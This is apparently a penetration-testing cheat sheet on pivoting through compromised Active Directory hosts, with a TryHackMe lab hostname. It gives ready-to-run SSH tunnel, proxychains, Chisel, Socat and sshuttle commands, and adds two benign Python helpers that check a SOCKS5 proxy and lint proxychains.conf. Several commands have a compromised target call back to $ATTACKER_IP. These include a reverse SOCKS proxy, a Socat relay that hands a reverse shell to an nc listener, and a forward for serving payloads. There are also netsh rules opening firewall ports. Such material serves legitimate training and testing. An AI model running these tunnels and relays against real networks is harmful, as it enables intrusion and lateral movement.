08 / Pivoting

Pivoting

Route traffic through compromised AD hosts to reach internal network segments. SSH tunnelling, Chisel, Socat and Proxychains to access systems that aren't directly reachable.


SSH Tunnelling & Port Forwarding

-L / -R / -D
Set up a tunnel user on the attacker (no shell: /bin/true blocks logins, but sshd still accepts -N forwarding sessions)
useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser
Local port forward (-L) — access a host behind pivot
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
# now: browse localhost:8000 → reaches 172.16.0.10:80
Remote port forward (-R) — expose target port on attacker
ssh tunneluser@$ATTACKER_IP -R 3389:$TARGET_IP:3389 -N
# run on the pivot host that can reach $TARGET_IP; binds 127.0.0.1:3389 on the attacker
# then, on the attacker:
xfreerdp3 /v:127.0.0.1 /u:username /p:password
Local port forward from target (expose the attacker's port 80 inside the internal network)
ssh tunneluser@$ATTACKER_IP -L *:80:127.0.0.1:80 -N
# run on the target: it listens on TARGET_IP:80 (all interfaces) and forwards
# to 127.0.0.1:80 on the attacker, e.g. a web server hosting payloads
# open firewall rule if needed (Windows target):
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80
Dynamic port forward / SOCKS proxy (-D)
ssh -D 1337 user@172.16.0.5 -fN
# SOCKS4/5 proxy on attacker 127.0.0.1:1337; traffic exits from 172.16.0.5
# or remote dynamic, run from the target (client-side feature, needs OpenSSH 7.6+ on the target):
ssh tunneluser@$ATTACKER_IP -R 9050 -N
# SOCKS proxy on attacker 127.0.0.1:9050; traffic exits from the target
Configure proxychains
sudo nano /etc/proxychains.conf
# add under [ProxyList]; the port must match the proxy you started (9050 for -R 9050, 1337 for -D 1337):
socks4  127.0.0.1 9050
# use:
proxychains curl http://pxeboot.za.tryhackme.com
proxychains nxc smb 172.16.0.0/24
proxychains impacket-secretsdump ...
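Once a SOCKS proxy is up (ssh -D, ssh -R 9050, or chisel's R:socks further down), it pays to check that it actually speaks SOCKS and can reach the inner host before running tools through proxychains, which reports every failure as a socket error or timeout. The following is an added example, not code from the original page or from any of the tools it covers: a minimal SOCKS5 client that does the no-auth handshake plus a CONNECT and reports the RFC 1928 reply code, which separates "proxy down" from "proxy up, but the destination refused". The inner host 172.16.0.10:22 is taken from the page's examples; the in-process fake proxy, unused_loopback_port() and the function names are constructed for the offline demo. Against a real pivot you would call socks5_connect("127.0.0.1", 1080, host, port).

```python
import socket
import struct
import threading

# RFC 1928 section 6 reply codes: the code tells you which side failed
REPLY = {
    0x00: "succeeded",
    0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "connection refused",
    0x06: "TTL expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}

def _recv_exact(s, n):
    """Read exactly n bytes; raise if the peer closes early."""
    buf = b""
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def _skip_address(s, atyp):
    """Consume an ATYP-encoded address plus its 2-byte port (BND.* or DST.*)."""
    if atyp == 0x01:
        _recv_exact(s, 4)                       # IPv4
    elif atyp == 0x03:
        _recv_exact(s, _recv_exact(s, 1)[0])    # length-prefixed domain name
    elif atyp == 0x04:
        _recv_exact(s, 16)                      # IPv6
    _recv_exact(s, 2)                           # port

def socks5_connect(proxy_host, proxy_port, dst_host, dst_port, timeout=5.0):
    """No-auth handshake + CONNECT. Returns ("proxy-down", why), ("proxy-error",
    reply text) or ("ok", end-to-end socket). dst_host is sent as DOMAINNAME
    so the pivot resolves it (the proxy_dns effect)."""
    try:
        s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    except OSError as e:
        return "proxy-down", str(e)
    try:
        s.sendall(b"\x05\x01\x00")              # VER 5, 1 method: NO AUTH
        ver, method = _recv_exact(s, 2)
        if ver != 0x05 or method != 0x00:
            raise ConnectionError(f"method negotiation failed ({ver:#x}, {method:#x})")
        name = dst_host.encode()
        # VER 5, CMD CONNECT, RSV 0, ATYP DOMAINNAME, len, name, DST.PORT
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name
                  + struct.pack("!H", dst_port))
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        _skip_address(s, atyp)                  # BND.ADDR / BND.PORT
        if rep != 0x00:
            raise ConnectionError(REPLY.get(rep, f"unknown reply {rep:#x}"))
        return "ok", s
    except OSError as e:                        # ConnectionError is an OSError
        s.close()
        return "proxy-error", str(e)

def fake_socks5_proxy(reply_code):
    """Constructed stand-in for ssh -D / chisel so the check runs offline: serves
    one client, accepts NO AUTH, answers CONNECT with reply_code. Returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            _ver, nmethods = _recv_exact(conn, 2)
            _recv_exact(conn, nmethods)
            conn.sendall(b"\x05\x00")           # pick NO AUTH
            _ver, _cmd, _rsv, atyp = _recv_exact(conn, 4)
            _skip_address(conn, atyp)           # DST.ADDR / DST.PORT
            conn.sendall(b"\x05" + bytes([reply_code]) + b"\x00\x01" + bytes(6))

    threading.Thread(target=serve, daemon=True).start()
    return port

def unused_loopback_port():
    """A port nothing listens on, to exercise the proxy-down path."""
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port

if __name__ == "__main__":
    # real pivot: socks5_connect("127.0.0.1", 1080, "172.16.0.10", 22)
    for code in (0x00, 0x05):
        status, detail = socks5_connect("127.0.0.1", fake_socks5_proxy(code), "172.16.0.10", 22)
        print(status, "tunnel up" if status == "ok" else detail)
```

A "proxy-down" result means the listener itself is missing (tunnel died, wrong port, -R without GatewayPorts bound only to loopback as expected); a "proxy-error" with "connection refused" or "host unreachable" means the pivot is fine and the problem is on the inner network, so no amount of proxychains tweaking will help.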

Proxychains

socks4/5
Copy conf to current directory (proxychains reads ./proxychains.conf before ~/.proxychains/proxychains.conf and /etc/proxychains.conf, so the local copy wins and needs no sudo)
cp /etc/proxychains.conf .
Configure the local copy
nano ./proxychains.conf
# keep exactly one chain mode uncommented (strict_chain or dynamic_chain)
# uncomment: proxy_dns   (resolve hostnames through the pivot instead of on the attacker)
# clear [ProxyList] and add an entry whose type and port match the proxy you started:
socks5  127.0.0.1 9050
Use through proxy
proxychains curl https://target.com
proxychains nmap -sT -Pn target.com    # TCP connect scans only: raw-socket scans (-sS), ICMP ping and UDP are not proxied
proxychains ssh user@target
proxychains nxc smb 10.10.10.10
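A stale proxychains.conf (port left at 9050 while the tunnel listens on 1080 or 1337, a socks4 entry against a SOCKS5-only proxy such as chisel, proxy_dns still commented out) fails exactly like a dead tunnel. As an added example that is not proxychains' own code, the parser below reads the conf the way proxychains does (one directive per line, '#' comments, [ProxyList] entries of the form "type host port") and flags those mistakes against the proxy you actually started. The two sample configs are constructed, and parse_proxychains_conf() / check_conf() are names chosen here.

```python
CHAIN_MODES = ("strict_chain", "dynamic_chain", "random_chain", "round_robin_chain")
PROXY_TYPES = ("socks4", "socks5", "http")

def parse_proxychains_conf(text):
    """Parse the conf as proxychains reads it: '#' starts a comment, one
    directive per line, and every line after [ProxyList] is 'type host port [user pass]'."""
    conf = {"chain": [], "proxy_dns": False, "proxies": [], "bad_lines": []}
    in_list = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_list = line.lower() == "[proxylist]"
            continue
        if in_list:
            parts = line.split()
            if len(parts) < 3 or parts[0] not in PROXY_TYPES or not parts[2].isdigit():
                conf["bad_lines"].append(line)
                continue
            conf["proxies"].append((parts[0], parts[1], int(parts[2])))
        elif line in CHAIN_MODES:
            conf["chain"].append(line)
        elif line.startswith("proxy_dns"):      # proxy_dns / proxy_dns_old / proxy_dns_daemon
            conf["proxy_dns"] = True
    return conf

def check_conf(conf, allowed_types, port):
    """Warnings for a conf meant to point at one proxy, e.g.
    check_conf(conf, ("socks5",), 1080) for chisel R:socks (SOCKS5 only),
    check_conf(conf, ("socks4", "socks5"), 1337) for ssh -D 1337."""
    warns = []
    if len(conf["chain"]) != 1:
        warns.append(f"need exactly one chain mode, found {conf['chain'] or 'none'}")
    if not conf["proxy_dns"]:
        warns.append("proxy_dns is off: hostnames resolve on the attacker, not through the pivot")
    if not conf["proxies"]:
        warns.append("[ProxyList] has no proxies")
    for ptype, host, pport in conf["proxies"]:
        if ptype not in allowed_types:
            warns.append(f"{ptype} {host} {pport}: proxy speaks {'/'.join(allowed_types)}, not {ptype}")
        elif pport != port:
            warns.append(f"{ptype} {host} {pport}: proxy listens on {port}, not {pport}")
    for line in conf["bad_lines"]:
        warns.append(f"unparseable [ProxyList] entry: {line}")
    return warns

# Constructed sample: distro default list left pointing at Tor's 9050 while a
# chisel reverse SOCKS is actually listening on 127.0.0.1:1080.
STALE_CONF = """\
# proxychains.conf
strict_chain
#proxy_dns
[ProxyList]
# defaults set to "tor"
socks4 \t127.0.0.1 9050
"""

# Constructed sample: the same file corrected for chisel.
FIXED_CONF = """\
strict_chain
proxy_dns
[ProxyList]
socks5  127.0.0.1 1080
"""

if __name__ == "__main__":
    for name, text in (("stale", STALE_CONF), ("fixed", FIXED_CONF)):
        warns = check_conf(parse_proxychains_conf(text), ("socks5",), 1080)
        print(name, "->", warns or "ok")
```

Run it against the copy in the working directory (the one proxychains will actually pick up) with the type and port of the tunnel you just started; the stale sample yields two warnings (proxy_dns off, socks4 against a SOCKS5 proxy) and the fixed one none.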

Chisel

reverse SOCKS / forward / port forward
Reverse SOCKS proxy (preferred in AD — target calls back)
# Attacker:
./chisel server -p $ATTACKER_PORT --reverse &
# Target:
./chisel client $ATTACKER_IP:$ATTACKER_PORT R:socks &
# SOCKS5 proxy opens on the attacker at 127.0.0.1:1080 (chisel default); use socks5 127.0.0.1 1080 in proxychains
Forward SOCKS proxy
# Target:
./chisel server -p $TARGET_PORT --socks5
# Attacker:
./chisel client $TARGET_IP:$TARGET_PORT 1337:socks
# SOCKS5 proxy on attacker 127.0.0.1:1337; requires inbound access to the target port
Remote port forward
# Attacker:
./chisel server -p 1337 --reverse &
# Target:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &
# Now: ssh -p 2222 user@127.0.0.1 reaches 172.16.0.10:22
Local port forward
# Target:
./chisel server -p 8000
# Attacker:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22
proxychains.conf for chisel SOCKS5
[ProxyList]
socks5  127.0.0.1 1080

Socat

relay / port forward
Reverse shell relay (pivot relays a shell from an inner host to the attacker)
# Attacker:
sudo nc -lvnp 443
# Target (pivot host):
./socat tcp-l:8000 tcp:$ATTACKER_IP:443 &
# Inner host: point the reverse shell at PIVOT_IP:8000; socat hands the connection to the attacker's listener on 443
Port forward (easy)
./socat TCP4-LISTEN:3389,fork TCP4:$TARGET_IP:3389
# run on the pivot; attacker connects to PIVOT_IP:3389 (opens a listening port on the pivot, visible to defenders)
# add firewall rule if needed:
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
Port forward (quiet: no listening port opened on the pivot)
# Attacker (start first; 8001 receives the pivot's outbound connection, 8000 is the local entry point):
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
# Target (pivot): connects out to the attacker and onward to the inner host
./socat tcp:$ATTACKER_IP:8001 tcp:$TARGET_IP:$TARGET_PORT,fork &
# Now: localhost:8000 on attacker → $TARGET_IP:$TARGET_PORT

sshuttle (Linux → Linux only)

transparent proxy
# routes the whole subnet through the pivot with local iptables rules; needs python on the pivot and sudo locally
sshuttle -r user@$TARGET_IP 172.16.0.0/24 -x $TARGET_IP
# -x excludes the pivot itself so the SSH session is not routed into its own tunnel
sshuttle -r user@$TARGET_IP --ssh-cmd "ssh -i KEYFILE" 172.16.0.0/24 -x $TARGET_IP
sshuttle -r user@$TARGET_IP -N   # auto-detect subnets from the pivot's routing table